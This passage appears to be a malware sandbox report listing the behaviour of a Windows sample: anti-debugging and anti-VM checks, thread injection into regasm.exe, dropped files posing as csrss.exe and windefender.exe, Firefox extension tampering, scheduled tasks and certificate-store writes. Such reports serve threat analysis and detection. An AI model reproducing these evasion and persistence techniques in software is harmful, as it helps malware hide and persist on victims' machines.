| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4960 set thread context of 4284 | N/A | C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\RVqmAwyyxwiU2\LHvjJyj.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\GaDkQze.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\FaYwZcq.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\ARTXeDTAxvUn\ILNjVYD.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\ByWuwrOBU\WnleIRa.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\DUGaRsFaSnqjC\qaeykIa.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\DUGaRsFaSnqjC\OTNmBJT.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\ByWuwrOBU\ojTVpK.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\RVqmAwyyxwiU2\BoPjNTTVXpgKP.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\Tasks\QhciBzJOokLnyYZub.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\Tasks\qbSDwEgyNYPZlGA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| File created | C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5991a7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5991a7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\bWycNackLSywaqkmgR.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-162 = "Central Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-571 = "China Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76